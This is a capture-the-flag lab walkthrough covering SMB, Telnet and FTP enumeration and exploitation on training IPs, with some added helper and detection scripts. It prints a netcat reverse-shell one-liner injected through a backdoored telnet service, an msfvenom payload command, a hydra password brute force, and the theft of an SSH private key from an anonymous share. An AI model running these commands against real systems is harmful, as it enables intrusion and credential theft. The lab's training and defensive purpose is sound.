# Network Services

### Task 2 - Understanding SMB

#### All Things about SMB

**What is SMB?**

*Server Message Block Protocol* - a client-server communication protocol used for sharing access to files, printers, serial ports and other resources on a network.

**What runs SMB?**

```
Samba, an open source server that supports the SMB protocol. 
```

**What type of protocol is SMB?**

```
response-request 
```

**What do clients connect to servers using?**

```
TCP/IP.
```

***

### Task 3 - Enumerating SMB

**Enumeration**

Enumeration is the process of gathering information on a target in order to find potential attack vectors and aid in exploitation.

```
all things against Bruno Fraga. 
```

**SMB**

Typically, there are SMB share drives on a server that can be connected to and used to view or transfer files. *This is often a great starting point for an attacker looking for sensitive information.*

**Port Scanning (Nmap)**

The first step of enumeration is to conduct a port scan.

**Enum4Linux**

```bash
enum4linux [options] ip
```

A tool used to enumerate SMB shares on both Windows and Linux systems.

## 10.10.96.104 - polosmb3

### Nmap Scan

```bash
root@ip-10-10-70-123:~# nmap -sC -sV -vvv 10.10.96.104

Starting Nmap 7.60 ( https://nmap.org ) at 2023-05-01 02:51 BST
NSE: Loaded 146 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 02:51
Completed NSE at 02:51, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 02:51
Completed NSE at 02:51, 0.00s elapsed
Initiating ARP Ping Scan at 02:51
Scanning 10.10.96.104 [1 port]
Completed ARP Ping Scan at 02:51, 0.22s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 02:51
Completed Parallel DNS resolution of 1 host. at 02:51, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 1, NX: 0, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 02:51
Scanning ip-10-10-96-104.eu-west-1.compute.internal (10.10.96.104) [1000 ports]
Discovered open port 22/tcp on 10.10.96.104
Discovered open port 139/tcp on 10.10.96.104
Discovered open port 445/tcp on 10.10.96.104
Completed SYN Stealth Scan at 02:51, 1.26s elapsed (1000 total ports)
Initiating Service scan at 02:51
Scanning 3 services on ip-10-10-96-104.eu-west-1.compute.internal (10.10.96.104)
Completed Service scan at 02:51, 11.02s elapsed (3 services on 1 host)
NSE: Script scanning 10.10.96.104.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 02:51
Completed NSE at 02:51, 0.30s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 02:51
Completed NSE at 02:51, 0.00s elapsed
Nmap scan report for ip-10-10-96-104.eu-west-1.compute.internal (10.10.96.104)
Host is up, received arp-response (0.00092s latency).
Scanned at 2023-05-01 02:51:20 BST for 13s
Not shown: 997 closed ports
Reason: 997 resets
PORT    STATE SERVICE     REASON         VERSION
22/tcp  open  ssh         syn-ack ttl 64 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 91:df:5c:7c:26:22:6e:90:23:a7:7d:fa:5c:e1:c2:52 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCsQBsFkx22xGvnoVM2jdoshYhErSrOah7KuFFxx17bNXpP0ngmmi8eg8cF15/W09dFRZkHpolm+hwczAJg8YtCikckf57z6tuMZIJG97TEFjtevvyw2hB7YjUJXCsQOkGKUkHs8q1QqiTX0jFaM/LQdZm+77MxuaU8XXbcghfHISAyh2++AwD6LIIJvVKk/1vjMHO6GtgoyvVmlVrITZv+5naaAUgfyqoKJr2mfsJDl8MpalE4Fb9aXP2LopBgQ5YetpjFI4kyvxlaZZ86nrvvCc5FZWXM5ezfJT1R8fIaM8+3rY/6ktlVzQ/C3fNqJaT9YolYOYcQuHZ1mJ7rrE0P
|   256 86:57:f5:2a:f7:86:9c:cf:02:c1:ac:bc:34:90:6b:01 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCdRH8y2bhSww6mxtO3NwyfVfbhPCFZ8RxKhZrmc4LoqyRvJhmISqcY/e9JmkvjeqFx+QLGsadZo3ap9QyVuDAE=
|   256 81:e3:cc:e7:c9:3c:75:d7:fb:e0:86:a0:01:41:77:81 (EdDSA)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBOdFR83uui/AaLq3bUcJ0REIIL0laVVmSMvkeVpGWd1
139/tcp open  netbios-ssn syn-ack ttl 64 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn syn-ack ttl 64 Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
MAC Address: 02:59:8A:A4:FC:1D (Unknown)
Service Info: Host: POLOSMB; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 0s, deviation: 0s, median: 0s
| nbstat: NetBIOS name: POLOSMB, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   POLOSMB<00>          Flags: <unique><active>
|   POLOSMB<03>          Flags: <unique><active>
|   POLOSMB<20>          Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|   WORKGROUP<00>        Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|   WORKGROUP<1e>        Flags: <group><active>
| Statistics:
|   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_  00 00 00 00 00 00 00 00 00 00 00 00 00 00
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 12104/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 25620/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 30020/udp): CLEAN (Failed to receive data)
|   Check 4 (port 57853/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: polosmb
|   NetBIOS computer name: POLOSMB\x00
|   Domain name: \x00
|   FQDN: polosmb
|_  System time: 2023-05-01T01:51:33+00:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2023-05-01 02:51:33
|_  start_date: 1600-12-31 23:58:45

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 02:51
Completed NSE at 02:51, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 02:51
Completed NSE at 02:51, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.46 seconds
           Raw packets sent: 1002 (44.072KB) | Rcvd: 1002 (40.080KB)
           
```
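
Reading the report above by hand is fine for one host, but the habit worth building is to pull out the handful of lines that decide the next move. The script below is an added example (mine, not part of the room or the notes above): it parses an `nmap -sC -sV` report for the open ports, the exact Samba version, whether the NSE scripts got in with a guest session, and whether SMB signing is required, and turns that into the follow-up commands for this task. The report excerpt is constructed from the scan above and embedded inline; the suggested commands assume the tools named in these notes (`enum4linux`, `smbclient`), and the relay remark is a general property of unsigned SMB, not something this scan proves by itself.

```python
import re

# Constructed excerpt of the nmap -sC -sV -vvv report above, trimmed to the lines this script reads.
NMAP_REPORT = """\
PORT    STATE SERVICE     REASON         VERSION
22/tcp  open  ssh         syn-ack ttl 64 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
139/tcp open  netbios-ssn syn-ack ttl 64 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn syn-ack ttl 64 Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: POLOSMB; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: polosmb
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
"""

# Port line: "445/tcp open  netbios-ssn syn-ack ttl 64 Samba smbd ...".
# The REASON column only appears with -vv/--reason, so it is optional here.
PORT_RE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+open\s+(?P<service>\S+)\s+"
    r"(?:syn-ack(?:\s+ttl\s+\d+)?\s+)?(?P<version>.*)$"
)


def parse_open_ports(report):
    """Return {port: (service, version)} for every 'open' port line in the report."""
    ports = {}
    for line in report.splitlines():
        m = PORT_RE.match(line)
        if m:
            ports[int(m["port"])] = (m["service"], m["version"].strip())
    return ports


def smb_findings(report):
    """Pull the SMB facts that decide the next step out of the NSE script output."""
    findings = {
        "samba_version": None,
        "guest_session": "account_used: guest" in report,        # guest/null session was accepted
        "smb1_signing_disabled": "message_signing: disabled" in report,
        "smb2_signing_required": None,
    }
    m = re.search(r"Samba smbd (\d[\d.]*-\S+)", report)            # exact version, e.g. 4.7.6-Ubuntu
    if m:
        findings["samba_version"] = m.group(1)
    m = re.search(r"Message signing (enabled and required|enabled but not required|disabled)", report)
    if m:
        findings["smb2_signing_required"] = m.group(1) == "enabled and required"
    return findings


def next_steps(target, ports, findings):
    """Follow-up commands for the enumeration task, derived from what the scan showed."""
    cmds = []
    if 445 in ports or 139 in ports:
        cmds.append(f"enum4linux -a {target}")          # users, shares, password policy, OS info
        cmds.append(f"smbclient -L //{target} -N")      # -N: no password, i.e. try a null session
    if findings["guest_session"]:
        cmds.append(f"smbclient //{target}/[share] -U Anonymous   # guest access worked for nmap")
    if findings["smb2_signing_required"] is False:
        # Unsigned SMB means an attacker on the path can relay captured NTLM
        # authentication to this host; worth noting in the report, not exploited here.
        cmds.append(f"# NOTE: SMB signing not required on {target}: NTLM relay is possible")
    return cmds


if __name__ == "__main__":
    ports = parse_open_ports(NMAP_REPORT)
    findings = smb_findings(NMAP_REPORT)
    print(ports)
    print(findings)
    print("\n".join(next_steps("10.10.96.104", ports, findings)))
```

The `account_used: guest` line is the one that matters most for this room: it means the scripts already authenticated without credentials, so `enum4linux` and an anonymous `smbclient` session are the obvious next steps.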

## Second scan (all 65535 ports):

```bash
root@ip-10-10-70-123:~# nmap -sS -sV -sC -p- -vv -T5 10.10.96.104

Starting Nmap 7.60 ( https://nmap.org ) at 2023-05-01 02:59 BST
NSE: Loaded 146 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 02:59
Completed NSE at 02:59, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 02:59
Completed NSE at 02:59, 0.00s elapsed
Initiating ARP Ping Scan at 02:59
Scanning 10.10.96.104 [1 port]
Completed ARP Ping Scan at 02:59, 0.22s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 02:59
Completed Parallel DNS resolution of 1 host. at 02:59, 0.00s elapsed
Initiating SYN Stealth Scan at 02:59
Scanning ip-10-10-96-104.eu-west-1.compute.internal (10.10.96.104) [65535 ports]
Discovered open port 22/tcp on 10.10.96.104
Discovered open port 445/tcp on 10.10.96.104
Discovered open port 139/tcp on 10.10.96.104
Warning: 10.10.96.104 giving up on port because retransmission cap hit (2).
SYN Stealth Scan Timing: About 25.42% done; ETC: 03:01 (0:01:31 remaining)
SYN Stealth Scan Timing: About 49.40% done; ETC: 03:01 (0:01:02 remaining)
```

***

### Task 4 - Exploiting SMB

**Types of SMB Exploit**

**Method Breakdown**

From the enumeration stage, we know:

* The SMB share location
* The name of an interesting SMB share

**Syntax** (`//[ip]/[share]`, `-U` username, `-p` port):

```bash
smbclient //10.10.10.2/secret -U suit -p 139
```

```bash
┌──(root㉿kali)-[~]
└─# smbclient //10.10.174.46/profiles -U Anonymous
```

Inside the smbclient session, download the file that looks interesting:

```bash
smb: \> get "Working From Home Information.txt"
```

```
┌──(root㉿kali)-[/home/kali]
└─# cat Working\ From\ Home\ Information.txt 
```

```
Name: John Cactus - **ssh access** 
```

Still in the smbclient session: `cd .ssh` > `ls` > `get id_rsa`. ***In my terminal:*** `chmod 600 id_rsa` (ssh refuses to use a private key that other users can read).

```
┌──(root㉿kali)-[/home/kali]
└─# ssh -i id_rsa cactus@10.10.174.46
```

After logging in: `ls` > `cat` the `.txt` file > flag.

***

### Task 5 - Understanding Telnet

**What is Telnet?**

`Application protocol: connect to and execute commands on a remote machine that is hosting a telnet server, through the telnet client.`

**Replaced by SSH**

```
All messages are sent in clear text and Telnet has no specific security mechanisms.
Telnet has been replaced by SSH, which uses cryptography.
```

**How does Telnet work?**

```
User connects to the server by using the Telnet protocol.
```

`syntax: telnet [ip] [port]`

***

### Task 6 - Enumerating Telnet

`Enumeration stage`: 1 open port found: `8012/tcp`. Syntax used: `nmap -A -vv -p 8012 10.10.15.23`


***

### Task 7 - Exploiting Telnet

**Types of Telnet Exploit**

**Method Breakdown**

From the enumeration stage, we know:

* A poorly hidden telnet service is running on this machine
* The service itself is marked "backdoor"
* A possible username of "Skidy" is implicated

**Connecting to Telnet**

`syntax: "telnet [ip] [port]"`

**What is a Reverse Shell?**

```
A piece of code or program which can be used to gain code or command execution on a device.
The target machine communicates back to the attacking machine.
The attacking machine has a listening port on which it receives the connection, resulting in code or command execution.
```

Before trying the reverse shell, check that the target can reach the attacking machine at all. On the attacking machine:

```bash
sudo tcpdump ip proto \\icmp -i tun0
```

This starts a tcpdump listener, specifically listening for ICMP traffic, which pings operate on. Then, from the telnet session, ping the attacking machine: `ping [local THM ip] -c 1`, in my case `ping 10.10.72.61 -c 1` (10.10.72.61 is my machine's tun0 address). If the packet shows up in tcpdump, the target can talk back to us.

Now generate a reverse shell payload using msfvenom:

```bash
msfvenom -p cmd/unix/reverse_netcat lhost=[local tun0 ip] lport=4444 R
```

`lhost` is my PC's tun0 IP (the machine the target will connect back to); `R` outputs the raw payload.

For Telnet command injection, the payload is sent in the telnet session prefixed with `.RUN`:

```bash
.RUN mkfifo /tmp/xoza; nc 10.10.59.43 4444 0</tmp/xoza | /bin/sh >/tmp/xoza 2>&1; rm /tmp/xoza
```

But first, open a netcat listener on the attacking machine (syntax: `nc -lvp [listening port]`); I used:

```bash
nc -lnvp 4444
```

Then, in the telnet connection, send the `.RUN` payload above to open the reverse shell.

***

### Task 8 - Understanding FTP

**What is FTP?**

File Transfer Protocol: protocol used to allow remote transfer of files over a network.

`ftp default port: 21`

**How does FTP work?**

FTP operates using a client-server protocol. The client initiates a connection with the server, the server validates whatever login credentials are provided and then opens the session.

**Active vs Passive**

An FTP server may support either Active or Passive connections, **or both.**

* In an Active FTP connection, the client opens a port and listens. The server is required to actively connect to it.
* In a Passive FTP connection, the server opens a port and listens (passively) and the client connects to it.
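
Worked example of the two modes, added here and not taken from the room: the passive reply the server sends (`227 Entering Passive Mode (h1,h2,h3,h4,p1,p2)`) and the `PORT` command the client sends in active mode both encode an IP and a port as six comma-separated bytes, with the port split as `p1*256 + p2`. The parser also includes the check a careful client makes: in passive mode the server tells you where to connect, and a misconfigured or hostile server can advertise a host other than the one you are talking to, so by default the data connection reuses the control connection's peer address. The reply text and addresses are constructed; the port number is arbitrary.

```python
import re

PASV_RE = re.compile(r"\((\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})\)")


def parse_pasv_reply(reply):
    """Parse '227 Entering Passive Mode (h1,h2,h3,h4,p1,p2)' into (host, port).
    In passive mode the *server* listens here and the client connects to it."""
    if not reply.startswith("227"):
        raise ValueError(f"not a PASV reply: {reply!r}")
    m = PASV_RE.search(reply)
    if not m:
        raise ValueError(f"no address in PASV reply: {reply!r}")
    fields = [int(x) for x in m.groups()]
    if any(not 0 <= f <= 255 for f in fields):      # every field is one byte on the wire
        raise ValueError(f"field out of range in PASV reply: {reply!r}")
    h1, h2, h3, h4, p1, p2 = fields
    return f"{h1}.{h2}.{h3}.{h4}", p1 * 256 + p2


def build_port_command(host, port):
    """Build the active-mode 'PORT h1,h2,h3,h4,p1,p2' command: the *client* listens
    on host:port and asks the server to connect back (which is why active mode
    fails for clients behind NAT or an inbound firewall)."""
    octets = host.split(".")
    if len(octets) != 4 or any(not o.isdigit() or not 0 <= int(o) <= 255 for o in octets):
        raise ValueError(f"not an IPv4 address: {host!r}")
    if not 1 <= port <= 65535:
        raise ValueError(f"port out of range: {port}")
    return f"PORT {','.join(octets)},{port // 256},{port % 256}"


def passive_data_endpoint(reply, control_peer, trust_advertised_host=False):
    """Decide where to open the data connection after a PASV reply.
    The advertised host is only honoured when explicitly trusted; otherwise the
    peer of the control connection is used (what most clients do, since a server
    behind NAT often advertises its private address, and a hostile one can
    point the client anywhere)."""
    host, port = parse_pasv_reply(reply)
    if host != control_peer and not trust_advertised_host:
        host = control_peer
    return host, port


if __name__ == "__main__":
    reply = "227 Entering Passive Mode (10,10,253,225,195,89)."
    print(parse_pasv_reply(reply))                        # ('10.10.253.225', 50009)
    print(build_port_command("10.10.70.123", 50009))      # PORT 10,10,70,123,195,89
    print(passive_data_endpoint("227 Entering Passive Mode (192,168,0,5,195,89).", "10.10.253.225"))
```

Practical consequence for the room: the `ftp` client defaults to passive mode, so it only needs an outbound connection to the advertised port; if a transfer hangs right after `PASV`, that port range is filtered somewhere between you and the server.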

### Task 9 - Enumerating FTP

**Lets Get Started**

* Enumeration: `nmap`; for any tool, `tool [-h / -help / --help]` or `man [tool]`.
* Method: We're going to be exploiting an anonymous FTP login, to see what files we can access and whether they contain any information that might allow us to pop a shell on the system. This is a common pathway in CTF challenges, and mimics a real-life careless implementation of FTP servers.
* Resources: an FTP client needs to be installed on the system; `sudo apt install ftp` to install one.
* Alternative enumeration methods: FTP server variants return different responses to the `cwd` command, which can be used to fingerprint the server, because `cwd` commands can be issued before authentication.

This vulnerability is documented at: <https://www.exploit-db.com/exploits/20745>

***

```
Step-by-step:
1. Run nmap:
    1.  Fast nmap for quick enumeration and start.
    ┌──(root㉿kali)-[~]
    └─# nmap -T4 10.10.253.225 
```

```
 2. Enumerate the ports found (no space after the comma, or nmap reads "80" as a second target).
    ┌──(root㉿kali)-[~]
    └─# nmap -A -vvv -p 21,80 10.10.253.225 | tee /home/kali/Documents/nmaps/ftpfinal 
```

Add `-Pn` if nmap reports: `Host seems down. If it is really up, but blocking our ping probes, try -Pn`

```
 3. Checking possible ports.
    ┌──(root㉿kali)-[~]
    └─# nmap -sS -sC -sV -p- -vv -T5 10.10.253.225 
```

```
2. Connect to FTP with the anonymous login and download the notice:
    ┌──(root㉿kali)-[~]
    └─# ftp 10.10.253.225
    (log in as anonymous)
    ftp> get PUBLIC_NOTICE.txt
```

```
3. Cat file [PUBLIC_NOTICE.txt] 
```

```bash
┌──(root㉿kali)-[/home/kali]
└─# cat PUBLIC_NOTICE.txt 
===================================
MESSAGE FROM SYSTEM ADMINISTRATORS
===================================

Hello,

I hope everyone is aware that the
FTP server will not be available 
over the weekend- we will be 
carrying out routine system 
maintenance. Backups will be
made to my account so I reccomend
encrypting any sensitive data.

Cheers,

Mike
```

***

### Task 10 - Exploiting FTP

**Types of FTP Exploit**

Similarly to Telnet, with FTP both the command and data channels are unencrypted. Anything sent through this protocol can be intercepted and read in a man-in-the-middle attack, so an attacker on the path could recover credentials and file contents.

**Method Breakdown**

Our enumeration stage, we know:

```
- There is an FTP server running on this machine
- We have a possible username (mike, who signed PUBLIC_NOTICE.txt)
```

Using this information, let's try and brute-force the password of the FTP server.

**Hydra**

Hydra is a very fast online password cracking tool which can perform rapid dictionary attacks against many protocols: Telnet, RDP, SSH, FTP, HTTP, HTTPS, SMB, several databases, and more.

download hydra: <https://github.com/vanhauser-thc/thc-hydra>

Syntax (`-t` threads, `-l` username, `-P` wordlist, `-vV` verbose):

```bash
hydra -t 4 -l dale -P /usr/share/wordlists/rockyou.txt -vV 10.10.10.6 ftp
```

Practice:

```
Our case:
┌──(root㉿kali)-[/home/kali]
└─# hydra -t 50 -l mike -P /usr/share/wordlists/rockyou.txt -vV 10.10.253.225 ftp 
```

Run hydra; it finds the password (id: mike / password: password). Log in to FTP with it and read the flag:

```bash
└─# ftp 10.10.253.225      # user mike, password: password
ftp> get ftp.txt
└─# cat ftp.txt
```
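
A `hydra -t 50` run is noisy: the server records one failed login per guess from the same client within a few seconds, often followed by a success. The script below is an added example of mine, not part of the room: a small detector run over constructed vsftpd-style log lines (the `[pid N] [user] FAIL LOGIN: Client "ip"` layout is assumed from vsftpd's default `vsftpd.log`; it is not output from the target here). It flags a source that produces many failures inside a sliding window, and separately flags a later success from that same source, which is the event a defender actually has to act on.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# vsftpd's default vsftpd.log layout (assumed), e.g.
#   Mon May  1 03:10:00 2023 [pid 2311] [mike] FAIL LOGIN: Client "10.10.70.123"
LINE_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3}\s+\d{1,2} \d\d:\d\d:\d\d \d{4}) \[pid \d+\] '
    r'\[(?P<user>[^\]]*)\] (?P<result>OK|FAIL) LOGIN: Client "(?P<ip>[^"]+)"'
)


def _ts(t):
    """Format a timestamp the way vsftpd does (ctime style, day padded with a space)."""
    return t.strftime("%a %b ") + f"{t.day:2d}" + t.strftime(" %H:%M:%S %Y")


def constructed_log():
    """Constructed sample: a hydra run against 'mike' from 10.10.70.123 that succeeds
    on the 13th attempt, plus ordinary traffic from another client."""
    base = datetime(2023, 5, 1, 3, 10, 0)
    lines = [f'{_ts(base + timedelta(seconds=i))} [pid 2311] [mike] FAIL LOGIN: Client "10.10.70.123"'
             for i in range(12)]
    lines.append(f'{_ts(base + timedelta(seconds=12))} [pid 2311] [mike] OK LOGIN: Client "10.10.70.123"')
    lines.append(f'{_ts(base + timedelta(seconds=30))} [pid 2340] [anonymous] OK LOGIN: Client "10.10.80.9"')
    lines.append(f'{_ts(base + timedelta(seconds=31))} [pid 2341] [mike] FAIL LOGIN: Client "10.10.80.9"')  # one typo
    return lines


def parse_events(lines):
    """Yield (timestamp, user, result, client_ip) for each login line; skip the rest."""
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%a %b %d %H:%M:%S %Y")
            yield ts, m["user"], m["result"], m["ip"]


def detect_bruteforce(lines, threshold=10, window=timedelta(seconds=60)):
    """Sliding-window count of FAIL LOGIN per client IP. One alert when a client
    reaches `threshold` failures inside `window`, and one more if that client
    later logs in successfully (the brute force worked)."""
    recent = defaultdict(deque)     # ip -> timestamps of recent failures
    flagged = set()
    alerts = []
    for ts, user, result, ip in parse_events(lines):
        if result == "FAIL":
            q = recent[ip]
            q.append(ts)
            while q and ts - q[0] > window:
                q.popleft()
            if len(q) >= threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append(f"{ip}: {len(q)} failed FTP logins within "
                              f"{int(window.total_seconds())}s (last user {user})")
        elif ip in flagged:         # result == "OK"
            alerts.append(f"{ip}: successful login as {user} after brute force")
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(constructed_log()):
        print(alert)
```

The single failure from 10.10.80.9 is deliberately below the threshold: a detector that fires on every failed login is ignored within a day, while the "success after a burst of failures" alert is the one worth paging on.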

***

### Task 11 - Expanding Your Knowledge

**Further Learning**

**Reading**

Some things that might interest you:

* <https://medium.com/@gregIT/exploiting-simple-network-services-in-ctfs-ec8735be5eef>
* <https://attack.mitre.org/techniques/T1210/>
* <https://www.nextgov.com/cybersecurity/2019/10/nsa-warns-vulnerabilities-multiple-vpn-services/160456/>

***

